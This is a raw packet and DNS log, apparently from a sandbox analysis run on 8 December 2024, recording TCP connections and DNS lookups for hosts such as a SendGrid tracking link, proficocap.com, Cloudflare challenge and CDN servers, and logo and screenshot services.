                                                                          Dec 8, 2024 20:51:35.919368029 CET49885443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.919395924 CET4434988513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.919430971 CET49885443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.919435024 CET4434988513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.931852102 CET4434988613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.932183027 CET49886443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.932203054 CET4434988613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:35.932523966 CET49886443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:35.932528019 CET4434988613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.267666101 CET4434988413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.267731905 CET4434988413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.267885923 CET49884443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.267885923 CET49884443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.267926931 CET49884443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.267940044 CET4434988413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.270159960 CET49891443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.270191908 CET4434989113.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.270376921 CET49891443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.270818949 CET49891443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.270833969 CET4434989113.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.387931108 CET4434988513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.387991905 CET4434988513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.388154030 CET49885443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.388154030 CET49885443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.388190985 CET49885443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.388207912 CET4434988513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.388633013 CET4434988613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.388694048 CET4434988613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.388794899 CET49886443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.389199972 CET49886443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.389199972 CET49886443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.389214993 CET4434988613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.389223099 CET4434988613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.391256094 CET49892443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.391295910 CET4434989213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.391474009 CET49892443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.391474009 CET49892443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.391499996 CET4434989213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.392642975 CET49893443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.392673016 CET4434989313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:36.392745972 CET49893443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.392894983 CET49893443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:36.392910004 CET4434989313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.165313959 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.165838957 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:37.165874004 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.166160107 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.166497946 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:37.166549921 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.166614056 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:37.211337090 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.214833021 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:37.291979074 CET4434988813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.292866945 CET49888443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.292866945 CET49888443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.292927980 CET4434988813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.292943001 CET4434988813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.610490084 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.610564947 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.610589981 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.610621929 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:37.610625982 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.610652924 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.610693932 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:37.611197948 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.611259937 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:37.619884968 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.620237112 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.620321035 CET44349889172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:37.620340109 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:37.620393991 CET49889443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:37.667678118 CET4434989013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.668320894 CET49890443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.668338060 CET4434989013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.668991089 CET49890443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.668997049 CET4434989013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.731688976 CET4434988813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.731740952 CET4434988813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.731857061 CET49888443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.732069969 CET49888443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.732069969 CET49888443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.732086897 CET4434988813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.732095003 CET4434988813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.734505892 CET49894443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.734539032 CET4434989413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.734762907 CET49894443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.734978914 CET49894443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.734992027 CET4434989413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.996313095 CET4434989113.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.996886015 CET49891443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.996912003 CET4434989113.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:37.997466087 CET49891443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:37.997478008 CET4434989113.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:38.175368071 CET4434989013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:38.175436020 CET4434989013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:38.175543070 CET49890443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.175734997 CET49890443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.175734997 CET49890443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.175754070 CET4434989013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:38.175764084 CET4434989013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:38.178463936 CET49895443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.178503036 CET4434989513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:38.178760052 CET49895443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.178760052 CET49895443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.178791046 CET4434989513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:38.444192886 CET4434989113.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:38.444286108 CET4434989113.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:38.444473982 CET49891443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.444473982 CET49891443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.445437908 CET49891443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.445455074 CET4434989113.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:38.446944952 CET49896443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.446995974 CET4434989613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:38.447283983 CET49896443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.447412968 CET49896443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:38.447428942 CET4434989613.107.246.63192.168.2.4
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 8, 2024 20:50:13.171709061 CET53599201.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:13.209813118 CET53585131.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:16.105125904 CET53654071.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:17.063203096 CET5549053192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:17.063637972 CET5314153192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:17.205688953 CET53531411.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:17.207218885 CET53554901.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:19.389347076 CET5040053192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:19.389518023 CET5219453192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:19.611531973 CET53504001.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:19.622440100 CET53521941.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:21.936970949 CET4959953192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:21.936970949 CET5294753192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:22.215394020 CET53495991.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:22.215409994 CET53529471.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:25.274432898 CET6172953192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:25.274576902 CET5925153192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:25.417493105 CET53617291.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:25.418534994 CET53592511.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:32.198539019 CET4958053192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:32.198683023 CET4942153192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:32.201767921 CET5814353192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:32.201952934 CET4975853192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:32.340111017 CET53581431.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:32.340135098 CET53497581.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:32.341519117 CET53494211.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:32.341912031 CET53495801.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:33.169199944 CET53644421.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:33.377568007 CET138138192.168.2.4192.168.2.255
                                                                          Dec 8, 2024 20:50:34.318342924 CET5393953192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:34.318490028 CET6317053192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:34.456418037 CET53539391.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:34.462547064 CET53631701.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:35.161375046 CET5630753192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:35.161523104 CET5693453192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:50:35.314253092 CET53569341.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:35.314840078 CET53563071.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:50:51.964761019 CET53516061.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:12.973107100 CET53600591.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:13.388135910 CET6429153192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:13.388333082 CET5216353192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:13.388737917 CET5534553192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:13.388933897 CET5991253192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:13.569505930 CET53553451.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:13.569724083 CET53599121.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:13.569823027 CET53521631.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:15.010129929 CET53633771.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:16.215590954 CET5409553192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:16.215759039 CET5702453192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:16.216672897 CET5325353192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:16.216844082 CET5981653192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:16.371449947 CET53525421.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:16.619950056 CET53540951.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:16.627468109 CET53570241.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:16.831410885 CET53532531.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:16.831775904 CET53598161.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:20.247843027 CET5572653192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:20.248075962 CET5804253192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:20.424196005 CET53557261.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:20.424499989 CET53580421.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:25.278681040 CET5646853192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:25.278862953 CET5968053192.168.2.41.1.1.1
                                                                          Dec 8, 2024 20:51:25.422008991 CET53596801.1.1.1192.168.2.4
                                                                          Dec 8, 2024 20:51:25.423491001 CET53564681.1.1.1192.168.2.4
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 8, 2024 20:50:17.063203096 CET192.168.2.41.1.1.10x5795Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:17.063637972 CET192.168.2.41.1.1.10xdeb9Standard query (0)www.google.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.389347076 CET192.168.2.41.1.1.10x399eStandard query (0)u48644047.ct.sendgrid.netA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.389518023 CET192.168.2.41.1.1.10x87abStandard query (0)u48644047.ct.sendgrid.net65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:21.936970949 CET192.168.2.41.1.1.10x7385Standard query (0)proficocap.comA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:21.936970949 CET192.168.2.41.1.1.10x5e78Standard query (0)proficocap.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:25.274432898 CET192.168.2.41.1.1.10xbb0bStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:25.274576902 CET192.168.2.41.1.1.10x76d7Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:32.198539019 CET192.168.2.41.1.1.10x7ae0Standard query (0)proficocap.comA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:32.198683023 CET192.168.2.41.1.1.10xed18Standard query (0)proficocap.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:32.201767921 CET192.168.2.41.1.1.10x1ba5Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:32.201952934 CET192.168.2.41.1.1.10x25d5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:34.318342924 CET192.168.2.41.1.1.10xcf0bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:34.318490028 CET192.168.2.41.1.1.10x9249Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:35.161375046 CET192.168.2.41.1.1.10x2b2fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:35.161523104 CET192.168.2.41.1.1.10xbe42Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:51:13.388135910 CET192.168.2.41.1.1.10xb223Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:13.388333082 CET192.168.2.41.1.1.10x80abStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                          Dec 8, 2024 20:51:13.388737917 CET192.168.2.41.1.1.10xc07eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:13.388933897 CET192.168.2.41.1.1.10x9113Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.215590954 CET192.168.2.41.1.1.10x1dc5Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.215759039 CET192.168.2.41.1.1.10x7b4cStandard query (0)logo.clearbit.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.216672897 CET192.168.2.41.1.1.10xc60Standard query (0)image.thum.ioA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.216844082 CET192.168.2.41.1.1.10xa97bStandard query (0)image.thum.io65IN (0x0001)false
                                                                          Dec 8, 2024 20:51:20.247843027 CET192.168.2.41.1.1.10x9c1fStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:20.248075962 CET192.168.2.41.1.1.10x24a7Standard query (0)logo.clearbit.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:51:25.278681040 CET192.168.2.41.1.1.10xca53Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:25.278862953 CET192.168.2.41.1.1.10x170cStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 8, 2024 20:50:17.205688953 CET1.1.1.1192.168.2.40xdeb9No error (0)www.google.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:17.207218885 CET1.1.1.1192.168.2.40x5795No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.118.28A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.123.53A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.118.35A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.123.78A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.118.23A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.118.118A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.118.74A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.123.77A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.118.106A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.123.60A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.123.147A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.123.122A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.118.31A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.123.16A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.118.126A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:19.611531973 CET1.1.1.1192.168.2.40x399eNo error (0)u48644047.ct.sendgrid.net167.89.123.64A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:22.215394020 CET1.1.1.1192.168.2.40x7385No error (0)proficocap.com104.21.53.171A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:22.215394020 CET1.1.1.1192.168.2.40x7385No error (0)proficocap.com172.67.215.208A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:22.215409994 CET1.1.1.1192.168.2.40x5e78No error (0)proficocap.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:25.417493105 CET1.1.1.1192.168.2.40xbb0bNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:32.340111017 CET1.1.1.1192.168.2.40x1ba5No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:32.340111017 CET1.1.1.1192.168.2.40x1ba5No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:32.340135098 CET1.1.1.1192.168.2.40x25d5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:32.341519117 CET1.1.1.1192.168.2.40xed18No error (0)proficocap.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:32.341912031 CET1.1.1.1192.168.2.40x7ae0No error (0)proficocap.com172.67.215.208A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:32.341912031 CET1.1.1.1192.168.2.40x7ae0No error (0)proficocap.com104.21.53.171A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:34.456418037 CET1.1.1.1192.168.2.40xcf0bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:34.456418037 CET1.1.1.1192.168.2.40xcf0bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:34.462547064 CET1.1.1.1192.168.2.40x9249No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:35.314253092 CET1.1.1.1192.168.2.40xbe42No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:50:35.314840078 CET1.1.1.1192.168.2.40x2b2fNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:50:35.314840078 CET1.1.1.1192.168.2.40x2b2fNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:13.569505930 CET1.1.1.1192.168.2.40xc07eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:13.569505930 CET1.1.1.1192.168.2.40xc07eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:13.569724083 CET1.1.1.1192.168.2.40x9113No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Dec 8, 2024 20:51:13.569823027 CET1.1.1.1192.168.2.40x80abNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:13.570040941 CET1.1.1.1192.168.2.40xb223No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.619950056 CET1.1.1.1192.168.2.40x1dc5No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.619950056 CET1.1.1.1192.168.2.40x1dc5No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.619950056 CET1.1.1.1192.168.2.40x1dc5No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.619950056 CET1.1.1.1192.168.2.40x1dc5No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.619950056 CET1.1.1.1192.168.2.40x1dc5No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.627468109 CET1.1.1.1192.168.2.40x7b4cNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.831410885 CET1.1.1.1192.168.2.40xc60No error (0)image.thum.io34.202.133.228A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.831410885 CET1.1.1.1192.168.2.40xc60No error (0)image.thum.io54.174.1.1A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:16.831410885 CET1.1.1.1192.168.2.40xc60No error (0)image.thum.io34.200.110.203A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:20.424196005 CET1.1.1.1192.168.2.40x9c1fNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:20.424196005 CET1.1.1.1192.168.2.40x9c1fNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:20.424196005 CET1.1.1.1192.168.2.40x9c1fNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:20.424196005 CET1.1.1.1192.168.2.40x9c1fNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:20.424196005 CET1.1.1.1192.168.2.40x9c1fNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:20.424499989 CET1.1.1.1192.168.2.40x24a7No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 8, 2024 20:51:25.423491001 CET1.1.1.1192.168.2.40xca53No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                          • u48644047.ct.sendgrid.net
                                                                          • fs.microsoft.com
                                                                          • proficocap.com
                                                                          • a.nel.cloudflare.com
